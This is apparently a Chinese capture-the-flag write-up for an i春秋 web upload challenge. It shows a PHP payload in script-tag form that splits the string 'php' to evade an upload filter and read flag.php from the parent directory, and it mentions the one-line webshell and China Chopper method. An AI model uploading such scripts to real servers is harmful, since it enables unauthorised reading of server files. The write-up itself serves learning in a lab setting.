i春秋-web-upload(文件内容读取)(“百度杯”九月场)
2024-09-28 23:21:23
提示很明显,flag在flag.php中,所以,任务就是获取flag.php的内容。
方法一:一句话+菜刀(不再叙述)
方法二:上传脚本,使脚本拥有一定权限,再输出flag
先造一个php脚本
<script language="PHP">
echo((file_get_contents('flag.'.'p'.'h'.'p')));
</script>
访问结果为空白,源码也没有什么东西。
原因是php脚本上传在了一个没有执行权限的文件夹下或是没找到flag.php,于是向上级目录探索:
<script language="PHP">
echo((file_get_contents('../flag.'.'p'.'h'.'p')));
</script>
返回空白,查看源码拿到flag。
最新文章
- MVC5+EF6+MYSQl,使用codeFirst的数据迁移
- Windows bat脚本学习(1)
- ros科大讯飞语音识别
- [UCSD白板题] Take as Much Gold as Possible
- HTML静态网页 标签、表格
- 【POJ】【2096】Collecting Bugs
- MySQL(9):数据表的约束(列的属性)
- 大小写转换,split分割
- Android Recovery的汉化 显示中文
- php基本框架
- Android tools:context=";.MainActivity";的作用
- jquery插件简单的声明方法
- IOS开发-UI学习-UISlider(滑动条)的使用
- EOJ 3242 重复数
- 由linux命令谈学习操作系统的重要性
- ASP.NET Core下发布网站
- eclipse open call hierarchy无效
- python笔记—循环控制
- Linux 学习目录
- 火热的线上APP的源码分享,开箱即用
热门文章
- BUU re1
- 吴裕雄--天生自然JAVA面向对象高级编程学习笔记:继承的应用
- 白手起家Django项目发布下篇_Django项目nginx部署
- 题解 nflsoj550 【六校联合训练 省选 #9】序列
- 2-10 就业课(2.0)-oozie:2、介绍和安装1
- 将证书添加到受信任的根证书存储失败,出现以下错误:访问控制列表(ACL)结构无效
- 采用FLAG_ACTIVITY_CLEAR_TOP退出整个程序(多activity)
- PHP时间格式
- win2008R2 局域网共享
- java.neo的ByteBuffer与Netty 的ByteBuf